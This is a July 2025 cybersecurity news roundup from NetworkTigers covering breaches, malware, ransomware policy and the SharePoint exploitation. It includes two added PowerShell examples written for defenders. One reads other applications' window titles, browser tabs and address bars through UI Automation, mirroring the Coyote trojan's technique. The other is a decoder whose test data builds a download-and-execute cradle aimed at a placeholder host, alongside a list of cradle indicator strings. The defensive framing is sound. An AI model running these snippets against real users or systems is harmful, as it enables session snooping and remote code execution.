July 28, 2025

News roundup July 28, 2025

San Mateo, CA, July 28, 2025 — Stories, events, and developments that impacted the cybersecurity landscape last week, including emerging threats, policy changes, and industry responses.

Trump pushes AI for infrastructure, downplays security concerns

The Trump administration’s AI Action Plan urges critical infrastructure sectors to adopt AI tools for cyber defense while acknowledging the technology’s exposure to hacking, data leaks, and manipulation. Emphasizing “secure by design” principles, the plan calls for resilient AI systems able to detect performance anomalies and attacks such as data poisoning. It also proposes a new AI threat-sharing hub under DHS and asks NIST and CISA to update incident response protocols to cover AI-specific roles. Daniel Bardenstein, a former CISA official and cyber strategist who led the agency’s AI Bill of Materials initiative, faults the plan’s treatment of security: “The Action Plan talks about innovation, infrastructure, and diplomacy — but where’s the dedicated pillar for security and trust?… That’s a fundamental blind spot.” Privacy advocates warn that the plan’s deregulatory tone could encourage exploitative data practices.

Arizona woman jailed for helping North Koreans land U.S. tech jobs

Christina Marie Chapman of Arizona was sentenced to more than eight years in prison for helping North Korean IT workers infiltrate 309 U.S. companies through a large identity fraud and money laundering scheme. Chapman ran a laptop farm in her home so that remote workers overseas appeared to be logging in from inside the United States. According to the Justice Department, “Chapman also shipped 49 laptops and other devices supplied by U.S. companies to locations overseas, including multiple shipments to a city in China on the border with North Korea. More than 90 laptops were seized from Chapman’s home following the execution of a search warrant in October 2023.” The North Koreans she assisted obtained remote developer roles at major firms, including defense and technology companies, and collected more than $17 million in illicit payments. The operation, which also involved Ukrainian national Oleksandr Didenko and several unnamed foreign conspirators, depended on false identities.

New Coyote malware exploits Windows UI for bank logins

A new variant of the Coyote banking trojan is the first known malware to abuse Microsoft’s UI Automation (UIA) framework to steal financial credentials. Primarily targeting Brazilian users, Coyote uses UIA to read the UI elements of other applications and identify login windows for banks and cryptocurrency platforms. Akamai’s Tomer Peled explained that if the malware finds no match when scanning window titles, it uses UIA to walk child UI elements such as browser tabs or address bars and cross-references them against a hard-coded target list. First documented by Kaspersky in 2024, Coyote already had keylogging and screen-capture capabilities; its use of UIA gives it deeper access to sensitive data, much as Android trojans abuse accessibility services. Because UIA is a documented accessibility API, the reads need no code injection into the target application and look like legitimate assistive-technology activity. Akamai noted that without UIA, accessing and parsing sub-elements of external applications is technically difficult, which makes this adaptation a significant step forward for attackers. “Coyote can perform checks regardless of whether the malware is online or operating in offline mode,” Akamai warned.
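To make the capability concrete, the following PowerShell is an added example (not code from Akamai’s analysis or from the Coyote sample itself) that enumerates what UIA exposes about other processes’ windows: top-level window titles first, then child elements such as tab items and edit boxes. The depth limit, the control-type filter and the function name are assumptions chosen for the demonstration; it targets Windows PowerShell 5.1, where the UIA assemblies ship with the .NET Framework.

```powershell
# Added example, not taken from Akamai's write-up or from Coyote.
# Shows what UI Automation (UIA) lets an unprivileged process read out of OTHER
# processes' windows: window titles, tab names, address-bar text. Windows only.
Add-Type -AssemblyName UIAutomationClient, UIAutomationTypes

function Get-UiaElementNames {
    param(
        # Maximum depth below each top-level window to descend. Assumption: 3 levels
        # reach the tab strip and address bar of common browsers; adjust as needed.
        [int]$Depth = 3
    )
    $root     = [System.Windows.Automation.AutomationElement]::RootElement
    $anything = [System.Windows.Automation.Condition]::TrueCondition
    $children = [System.Windows.Automation.TreeScope]::Children

    # Level-by-level walk. FindAll(Children, ...) per node is used instead of one
    # TreeScope.Descendants query over the whole desktop, which can hang the shell.
    function Walk($element, $window, $level) {
        foreach ($child in $element.FindAll($children, $anything)) {
            [pscustomobject]@{
                Pid         = $child.Current.ProcessId
                Window      = $window
                Level       = $level
                ControlType = $child.Current.ControlType.ProgrammaticName
                Name        = $child.Current.Name
            }
            if ($level -lt $Depth) { Walk $child $window ($level + 1) }
        }
    }

    foreach ($win in $root.FindAll($children, $anything)) {
        # Level 0 is the top-level window; its Name is the window title that the
        # article describes Coyote matching before it descends into child elements.
        [pscustomobject]@{
            Pid         = $win.Current.ProcessId
            Window      = $win.Current.Name
            Level       = 0
            ControlType = $win.Current.ControlType.ProgrammaticName
            Name        = $win.Current.Name
        }
        Walk $win $win.Current.Name 1
    }
}

# Usage: list named tab, edit and document elements owned by processes other than
# this shell. On a desktop with a browser open, tab titles and the address bar appear.
Get-UiaElementNames -Depth 3 |
    Where-Object { $_.Pid -ne $PID -and $_.Name -and $_.ControlType -match 'TabItem|Edit|Document' } |
    Format-Table Pid, Window, Level, ControlType, Name -AutoSize
```

The point of running it is to see how much another process can learn about a browser session without touching the browser’s memory or installing hooks, and that the calls succeed from a standard user account. Since UIA is rarely used by anything other than assistive technology and test tooling, one hunting angle is to baseline which processes on a host load UIAutomationCore.dll and treat new, unexplained loaders as worth a look.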

Clorox hack blamed on IT provider’s password giveaway

Bleach maker Clorox has sued IT services provider Cognizant, accusing it of gross negligence in a 2023 cyberattack that Clorox says caused $380 million in damages. According to the complaint filed in California, the Scattered Spider group got into Clorox’s network simply by calling Cognizant’s help desk. “Cognizant was not duped by any elaborate ploy or sophisticated hacking techniques,” according to a copy of the lawsuit reviewed by Reuters. “The cybercriminal just called the Cognizant Service Desk, asked for credentials to access Clorox’s network, and Cognizant handed the credentials right over.” Clorox alleges that Cognizant failed to follow basic procedures, including verifying the caller’s identity before resetting credentials, deactivating compromised accounts, and restoring data properly during recovery. The complaint includes transcripts of calls in which the attackers were allegedly given passwords with minimal resistance. The breach severely disrupted Clorox’s operations, costing $50 million in remediation and millions more in lost sales.

Lumma malware resurfaces after global takedown

The Lumma infostealer malware-as-a-service platform is rebounding quickly after a May law enforcement action seized 2,300 domains and key parts of its infrastructure. The takedown disrupted the service but did not dismantle it. Its administrators quickly acknowledged the action on underground forums, claiming the central server had been wiped but not seized. Trend Micro analysts report that Lumma’s activity is now nearly back to pre-seizure levels, with new infrastructure in place and the operation regaining trusted status in the cybercriminal ecosystem. Lumma has also moved its infrastructure out from behind Cloudflare to Russia-based provider Selectel to evade future takedowns. Researchers say the resurgence shows that law enforcement action alone is not enough to dismantle financially motivated cybercrime networks. “Network telemetry indicates that Lumma’s infrastructure began ramping up again within weeks of the takedown,” Trend Micro confirmed.

Arizona blames CISA for weak response to election site hack

Arizona election officials say a pro-Iranian cyberattack defaced a statewide candidate portal, replacing several campaign photos with images of Ayatollah Ruhollah Khomeini. Investigators traced the breach to a Base64-encoded PowerShell script uploaded through a legacy portal built without modern security controls. Voter registration systems were not affected, but the incident prompted Arizona officials to accuse the Cybersecurity and Infrastructure Security Agency (CISA) of abandoning its election security responsibilities under the Trump administration. State CISO Michael Moore and Secretary of State Adrian Fontes condemned CISA’s absence, saying that “up until 2024, CISA was a strong and reliable partner in our shared mission of securing American digital infrastructure, but since then, the agency has been politicized and weakened by the current administration.” Delayed alerts about the recent SharePoint vulnerability were cited as further evidence of CISA’s diminished leadership. With CISA’s regional presence eroded and key staff gone, states like Arizona say they are left carrying national cybersecurity burdens without the agency’s support.
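A Base64-encoded PowerShell payload is routine to triage once you know the encoding. The PowerShell below is an added example (not from the Arizona investigation or any published indicator) that pulls the -EncodedCommand argument out of a process-creation command line, decodes it as UTF-16LE, and flags common download-cradle strings. It goes slightly beyond the single case in the article by accepting the abbreviated flag spellings powershell.exe allows; the function name, the indicator list and the three sample command lines are constructed for the demonstration.

```powershell
# Added example, not from the Arizona investigation. Decodes the -EncodedCommand
# argument out of a process-creation command line (e.g. a Sysmon Event ID 1 or
# Security 4688 record) so an analyst can read the script instead of the Base64.
function ConvertFrom-EncodedCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    # powershell.exe accepts -e, -ec, -en, -enc and -EncodedCommand. The \b keeps
    # -ExecutionPolicy / -ep from matching; {16,} skips short non-Base64 tokens.
    if (-not ($CommandLine -match '(?i)-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{16,})')) {
        return $null
    }
    $bytes = [Convert]::FromBase64String($Matches[1])
    # The encoded script is UTF-16LE ("Unicode" in .NET); decoding as UTF-8 yields junk.
    $script = [Text.Encoding]::Unicode.GetString($bytes)

    # Assumed triage indicators for download cradles and nested encoding; tune locally.
    $indicators = 'DownloadString', 'DownloadFile', 'Invoke-Expression', 'IEX',
                  'FromBase64String', 'Net.WebClient', 'Invoke-WebRequest'
    $hits = @($indicators | Where-Object { $script -match [regex]::Escape($_) })

    [pscustomobject]@{
        Decoded    = $script
        Indicators = $hits
        Suspicious = ($hits.Count -gt 0)
    }
}

# Constructed sample command lines, not real log data. The first decodes to a
# harmless "whoami"; the second is shaped like a typical download cradle; the
# third carries no encoded command and should be ignored.
$cradle  = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/s.ps1")'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$samples = @(
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -enc dwBoAG8AYQBtAGkA',
    "powershell.exe -nop -w hidden -EncodedCommand $encoded",
    'powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1'
)
foreach ($line in $samples) {
    $result = ConvertFrom-EncodedCommandLine -CommandLine $line
    if ($result) {
        '{0} -> suspicious={1} indicators=[{2}]' -f $result.Decoded, $result.Suspicious, ($result.Indicators -join ', ')
    } else {
        "no encoded command: $line"
    }
}
```

On a live host the command lines come from the event log rather than a literal array, for example from Get-WinEvent with a filter on the Microsoft-Windows-Sysmon/Operational log and event ID 1; the function is deliberately agnostic about the source. Two things the example makes visible: the UTF-16LE decoding step that trips up ad hoc one-liners, and the fact that flag abbreviations mean a detection that only looks for the literal string "-EncodedCommand" misses most real invocations.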

U.K. to ban ransom payments by public sector and key services

The U.K. government is moving to bar public sector bodies and critical infrastructure operators from paying ransoms after cyberattacks, with the aim of removing the financial incentive that sustains ransomware gangs. Under the proposed legislation, organizations such as schools, local councils, and the NHS would be prohibited from paying, and the government argues the change would make “the vital services the public rely on a less attractive target for ransomware groups.” Security Minister Dan Jarvis said the U.K. is “determined to smash the cyber criminal business model.” Businesses outside the ban’s scope would have to report any ransom payment and consult authorities about potential sanctions violations, a particular concern given the role of Russian-linked groups. A mandatory incident reporting regime is also being developed to improve the law enforcement response.

Ransomware group uses AI chatbot in negotiations

A newly launched ransomware-as-a-service operation called GLOBAL GROUP combines recycled malware infrastructure with AI-assisted negotiation. Announced by a threat actor known as $$$ on the RAMP forum, GLOBAL repackages elements of Mamona RIP and BlackLock, according to a forensic analysis by Picus Security. Its distinguishing feature is an AI chatbot embedded in the victim negotiation panel, which automates dialogue, applies psychological pressure, and keeps extortion running around the clock. The platform offers cross-platform Golang payloads, ChaCha20-Poly1305 encryption, and a modular builder that lets affiliates tailor attacks to different environments. Despite refinements such as goroutine-based concurrent encryption and filename scrambling, analysts found code reuse and infrastructure overlap with earlier strains, including shared mutex identifiers and exposed backend IP addresses tied to a Russian VPS provider. The AI-assisted double-extortion model lets GLOBAL scale with little human oversight, which reflects incremental refinement of technique rather than any change to the underlying threat model.

Dell confirms breach by rebranded World Leaks extortion group

Dell has confirmed that its Customer Solution Centers were breached by a data extortion group calling itself “World Leaks.” According to Dell, the attackers accessed synthetic, non-sensitive demonstration data and an outdated contact list. The company said the environment was isolated from customer systems and not used to deliver services, but did not disclose how the intrusion happened or whether a ransom was demanded. World Leaks, a rebrand of the group previously known as Hunters International, has abandoned file encryption in favor of pure data theft. Since January 2025 it has leaked data from 49 organizations exfiltrated with the gang’s custom tool. The group has also been linked to earlier attacks on SonicWall SMA 100 appliances that deployed a rootkit dubbed OVERSTEP.

Hackers exploiting unpatched Microsoft SharePoint systems

Microsoft is facing renewed scrutiny over its security as attackers actively exploit critical vulnerabilities in SharePoint, its widely used document management platform, in what Censys researcher Silas Cutler called a “dream for ransomware operators.” CISA confirmed that the flaws let attackers execute code and access the file system on on-premises servers. Although Microsoft has released patches, experts warn that the threat persists, with more than 10,000 organizations worldwide still running vulnerable configurations. Eye Security researchers further reported that attackers who got in before patching can retain long-term access afterward, so applying the update alone does not evict an intruder already on the server. U.S. federal agencies, universities, and private companies are reportedly among those compromised so far.


About NetworkTigers

NetworkTigers is the leader in the secondary market for Grade A, seller-refurbished networking equipment. Founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms, NetworkTigers provides consulting and network equipment to global governmental agencies, Fortune 2000, and healthcare companies. www.networktigers.com.

Ben Walker
Ben Walker is a freelance research-based technical writer. He has worked as a content QA analyst for AT&T and Pernod Ricard.
